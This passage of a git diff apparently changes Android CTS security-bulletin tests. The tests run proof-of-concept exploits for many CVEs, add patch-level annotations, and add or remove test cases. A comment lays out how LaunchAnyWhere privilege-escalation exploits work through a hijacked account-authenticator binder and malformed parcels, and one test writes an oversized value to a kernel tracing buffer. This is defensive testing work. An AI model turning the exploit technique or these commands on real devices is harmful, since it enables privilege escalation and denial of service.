+ * the only file we care about form the app will be GenMalformedParcel.java.
+ * Find that file and follow these steps to add a new LaunchAnyWhere test:
+ *
+ * 1. Copy GenMalformedParcel.java into the LaunchAnyWhere app at
+ * cts/hostsidetests/security/test-apps/launchanywhere/src... Rename the file
+ * and class after the CVE that you are addressing. Modify the class
+ * signature and method signature so that it implements
+ * IGenerateMalformedParcel (namely, add the `implements` clause and change
+ * the function to public Parcel generate(Intent intent)).
+ *
+ * 2. Next, add a hostside test to the appropriate file in this directory.
+ * In the test all you have to do is call
+ * LaunchSomeWhere.launchSomeWhere("CVE_20XX_XXXXX", getDevice());
+ *
+ * 3. Verify your test and submit, assuming all went well. If not then check
+ * for differences between the files in the submitted apk and the code in
+ * tests/tests/security/src/android/security/cts/launchanywhere.
+ *
+ * Exploit Overview:
+ * All LaunchAnyWhere exploits take advantage of classes that write more data
+ * than they read. They follow the same process to send an intent with system
+ * permissions. The process is described below (you do not need to understand
+ * this in order to create tests, but we learned this while debugging some
+ * things and don't want the information to be lost):
+ *
+ * 1. Add an account with the account type 'com.launchanywhere' When an account
+ * is added the AccountManager delegates the task of authenticating the
+ * account to an instance of AbstractAccountAuthenticator. Our malicious
+ * authenticator finds
+ * android.accounts.IAccountAuthenticatorResponse.Stub.Proxy and replaces
+ * it's mRemote field with our anonymous IBinder before returning a
+ * default-constructed bundle. We save the old value and delegate to it
+ * after altering the arguments when appropriate (MitM).
+ *
+ * 2. When we finish, our IBinder's transact is called. At this point we create
+ * a reboot intent and send it to the appropriate class to generate the
+ * malformed parcel. This grants the intent system permissions.
+ *
+ * 3. The phone reboots, proving a successful exploit.
+ */
+class LaunchSomeWhere {
+ public static void launchSomeWhere(String cve, ITestDevice device)
+ throws Exception {
+
+ String command = "am start";
+
+ String[] args = {
+ "--es", "cve", cve,
+ "-n", "com.android.security.cts.launchanywhere/.StartExploit"
+ };
+
+ for (String s : args) {
+ command += " " + s;
+ }
+
+ AdbUtils.runCommandLine(command, device);
+ if (device.waitForDeviceNotAvailable(9_000))
+ device.waitForDeviceAvailable();
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
index d3da935..4527c0c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
@@ -23,7 +23,7 @@
/**
* b/26323455
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_2419() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2419", getDevice(), 60);
@@ -34,8 +34,20 @@
/**
* b/26324307
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_0844() throws Exception {
AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
}
+
+ /**
+ * b/26593930
+ */
+ @SecurityTest(minPatchLevel = "2016-04")
+ public void testPocCVE_2016_2412() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-2412", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> system_server <<<",
+ logcatOut);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 9a1030d..886ebaf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -23,7 +23,7 @@
/**
* b/27555981
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2016_2460() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2460", getDevice(), 60);
@@ -31,4 +31,12 @@
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
assertNotMatches("[\\s\\n\\S]*IGraphicBufferProducer_Info is Leaked[\\s\\n\\S]*", logcat);
}
+
+ /**
+ * b/27275324
+ */
+ @SecurityTest(minPatchLevel = "2016-05")
+ public void testPocCVE_2015_1805() throws Exception {
+ AdbUtils.runPoc("CVE-2015-1805", getDevice(), 300);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
deleted file mode 100644
index 8c22dfb..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc16_06 extends SecurityTestCase {
-
- /**
- * b/27364029
- */
- @SecurityTest
- public void testPocCVE_2016_2062() throws Exception {
- if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runCommandLine("logcat -c" , getDevice());
- AdbUtils.runPoc("CVE-2016-2062", getDevice(), 60);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertMatches("[\\s\\n\\S]*CVE-2016-2062 passed[\\s\\n\\S]*", logcat);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 4fcab24..1e33083 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -22,19 +22,20 @@
/**
* b/28740702
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3818() throws Exception {
AdbUtils.runPoc("CVE-2016-3818", getDevice(), 60);
}
/**
- * b/27532522
+ * b/27890802
*/
- @SecurityTest
- public void testPocCVE_2016_3809() throws Exception {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- AdbUtils.runPoc("CVE-2016-3809", getDevice(), 60);
+ @SecurityTest(minPatchLevel = "2016-07")
+ public void testPocCVE_2016_3746() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-3746", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*CVE-2016-3809 test case failed[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcat);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
index 5cd86bd..3280a68 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
@@ -22,19 +22,8 @@
/**
* b/27773913
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testPocCVE_2016_2471() throws Exception {
AdbUtils.runPoc("CVE-2016-2471", getDevice(), 60);
}
-
- /**
- * b/28760453
- */
- @SecurityTest
- public void testPocCVE_2015_8839() throws Exception {
- AdbUtils.runCommandLine("logcat -c" , getDevice());
- AdbUtils.runPoc("CVE-2015-8839", getDevice(), 60);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertMatches("[\\s\\n\\S]*fallocate result EOPNOTSUPP[\\s\\n\\S]*", logcat);
- }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
deleted file mode 100644
index df116d4..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
+++ /dev/null
@@ -1,113 +0,0 @@
-/**
- * Copyright (C) 2016 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc16_10 extends SecurityTestCase {
-
- /**
- * b/30904789
- */
- @SecurityTest
- public void testPocCVE_2016_6730() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
- }
- }
-
- /**
- * b/30906023
- */
- @SecurityTest
- public void testPocCVE_2016_6731() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
- }
- }
-
- /**
- * b/30906599
- */
- @SecurityTest
- public void testPocCVE_2016_6732() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
- }
- }
-
- /**
- * b/30906694
- */
- @SecurityTest
- public void testPocCVE_2016_6733() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
- }
- }
-
- /**
- * b/30907120
- */
- @SecurityTest
- public void testPocCVE_2016_6734() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
- }
- }
-
- /**
- * b/30907701
- */
- @SecurityTest
- public void testPocCVE_2016_6735() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
- }
- }
-
- /**
- * b/30953284
- */
- @SecurityTest
- public void testPocCVE_2016_6736() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
- }
- }
-
- /**
- * b/30741779
- */
- @SecurityTest
- public void testPocCVE_2016_3916() throws Exception {
- AdbUtils.installApk("/cve_2016_3916.apk", getDevice());
- AdbUtils.runCommandLine("logcat -c" , getDevice());
-
- AdbUtils.runCommandLine("am start -n com.trendmicro.wish_wu.camera2/" +
- "com.trendmicro.wish_wu.camera2.Camera2TestActivity", getDevice());
- Thread.sleep(10000);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
- "[\\s\\n\\S]*>>> /system/bin/" +
- "mediaserver <<<[\\s\\n\\S]*", logcat);
-
- //make sure the app is uninstalled after the test
- AdbUtils.runCommandLine("pm uninstall com.trendmicro.wish_wu.camera2" , getDevice());
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
index d11a759..b6bb97b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
@@ -13,6 +13,7 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
+
package android.security.cts;
import android.platform.test.annotations.SecurityTest;
@@ -23,11 +24,81 @@
/**
* b/29149404
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2012_6702() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.runPoc("CVE-2012-6702", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
assertNotMatches("[\\s\\n\\S]*fail: encountered same random values![\\s\\n\\S]*", logcat);
}
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
index 8ae30d6..be17721 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
@@ -23,125 +23,12 @@
//Criticals
/**
- * b/31606947
+ * b/31796940
*/
- @SecurityTest
- public void testPocCVE_2016_8424() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
- }
- }
-
- /**
- * b/31797770
- */
- @SecurityTest
- public void testPocCVE_2016_8425() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
- AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
- }
- }
-
- /**
- * b/31799206
- */
- @SecurityTest
- public void testPocCVE_2016_8426() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
- AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
- }
- }
-
- /**
- * b/31799885
- */
- @SecurityTest
- public void testPocCVE_2016_8427() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
- containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
- AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
- }
- }
-
- /**
- * b/31993456
- */
- @SecurityTest
- public void testPocCVE_2016_8428() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
- }
- }
-
- /**
- * b/32160775
- */
- @SecurityTest
- public void testPocCVE_2016_8429() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
- }
- }
-
- /**
- * b/32225180
- */
- @SecurityTest
- public void testPocCVE_2016_8430() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
- AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
- }
- }
-
- /**
- * b/32402179
- */
- @SecurityTest
- public void testPocCVE_2016_8431() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
- }
- }
-
- /**
- * b/32447738
- */
- @SecurityTest
- public void testPocCVE_2016_8432() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
- }
- }
-
- /**
- * b/32125137
- */
- @SecurityTest
- public void testPocCVE_2016_8434() throws Exception {
- if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- // This poc is very verbose so we ignore the output to avoid using a lot of memory.
- AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
- }
- }
-
- /**
- * b/31668540
- */
- @SecurityTest
- public void testPocCVE_2016_8460() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
- assertTrue(!result.equals("Vulnerable"));
- }
- }
-
- /**
- * b/32659848
- */
- @SecurityTest
- public void testPoc32659848() throws Exception {
- String command =
- "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
- AdbUtils.runCommandLine(command, getDevice());
+ @SecurityTest(minPatchLevel = "2016-12")
+ public void testPocCVE_2016_8406() throws Exception {
+ String cmd ="ls -l /sys/kernel/slab 2>/dev/null | grep nf_conn";
+ String result = AdbUtils.runCommandLine(cmd ,getDevice());
+ assertNotMatchesMultiLine("nf_conntrack_(?!0{8})[A-Fa-f0-9]{8}", result);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
index 4fd98b7..c53926c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
@@ -21,13 +21,117 @@
@SecurityTest
public class Poc17_01 extends SecurityTestCase {
+ //Criticals
/**
- * b/31799863
+ * b/31797770
*/
- @SecurityTest
- public void testPocCVE_2016_8482() throws Exception {
- if(containsDriver(getDevice(), "/dev/nvmap")) {
- AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
}
}
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ // This poc is very verbose so we ignore the output to avoid using a lot of memory.
+ AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest(minPatchLevel = "2017-01")
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
index 44f7d27..27ded73 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
@@ -22,11 +22,33 @@
/**
* b/32799236
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testPocCVE_2017_0426() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.runPoc("CVE-2017-0426", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
assertNotMatches("[\\s\\n\\S]*Bugreports file in wrong path[\\s\\n\\S]*", logcatOut);
}
+
+ /**
+ * b/32706020
+ */
+ @SecurityTest(minPatchLevel = "2017-02")
+ public void testPocCVE_2017_0415() throws Exception {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runPoc("CVE-2017-0415", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcatOut);
+ }
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest(minPatchLevel = "2017-02")
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
index a6f1e04..0956581 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
@@ -23,20 +23,20 @@
/**
* b/31824853
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2016_8479() throws Exception {
if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
+ AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
// CTS begins the next test before device finishes rebooting,
// sleep to allow time for device to reboot.
- Thread.sleep(30000);
+ Thread.sleep(70000);
}
}
/**
* b/33940449
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0508() throws Exception {
if (containsDriver(getDevice(), "/dev/ion") &&
containsDriver(getDevice(), "/dev/dri/renderD129")) {
@@ -50,7 +50,7 @@
/**
* b/33899363
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0333() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD128")) {
AdbUtils.runPocNoOutput("CVE-2017-0333", getDevice(), 30);
@@ -62,7 +62,7 @@
/**
* b/33245849
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0334() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD129")) {
String out = AdbUtils.runPoc("CVE-2017-0334", getDevice());
@@ -74,7 +74,7 @@
/**
* b/32707507
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0479() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-0479", getDevice(), 60);
@@ -86,7 +86,7 @@
/*
* b/33178389
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0490() throws Exception {
String bootCountBefore =
AdbUtils.runCommandLine("settings get global boot_count", getDevice());
@@ -101,4 +101,5 @@
updateKernelStartTime();
assertEquals(bootCountBefore, bootCountAfter);
}
+
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
index 71e3975..ae83bcb 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
@@ -24,7 +24,7 @@
/**
* b/32342065
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2017_0553() throws Exception {
// Error code of 139 represents segmentation fault
getDevice().executeShellCommand("chmod +x /data/local/tmp/CVE-2017-0553");
@@ -35,7 +35,7 @@
/**
* b/72460737
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2014_3145() throws Exception {
assertFalse("VULNERABLE DEVICE DETECTED",
AdbUtils.runPocCheckExitCode("CVE-2014-3145", getDevice(), 60));
@@ -44,9 +44,24 @@
/**
* b/32813456
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2016_10229() throws Exception {
String out = AdbUtils.runPoc("CVE-2016-10229", getDevice());
assertNotMatchesMultiLine(".*OVERWRITE.*", out);
}
+
+ /**
+ * b/33621647
+ */
+ @SecurityTest(minPatchLevel = "2017-04")
+ public void testPocCVE_2017_0477() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0477.gif", "/data/local/tmp/CVE-2017-0477.gif",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+
+ // because runPocGetExitCode() isn't a thing
+ AdbUtils.runCommandLine("chmod +x /data/local/tmp/CVE-2017-0477", getDevice());
+ int code = AdbUtils.runCommandGetExitCode("/data/local/tmp/CVE-2017-0477", getDevice());
+ assertTrue(code != 139); // 128 + signal 11
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
deleted file mode 100644
index 2d6b44a..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc17_05 extends SecurityTestCase {
-
- /**
- * b/34277115
- */
- @SecurityTest
- public void testPocCVE_2017_0630() throws Exception {
- if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) {
- String commandOutput = AdbUtils.runCommandLine("cat /sys/kernel/debug/tracing" +
- "/printk_formats", getDevice());
- assertNotMatchesMultiLine(".*0x(?!0){8,16}[0-9a-fA-F]{8,16} : .*", commandOutput);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
new file mode 100644
index 0000000..c2c3e29
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import java.util.concurrent.TimeUnit;
+
+@SecurityTest
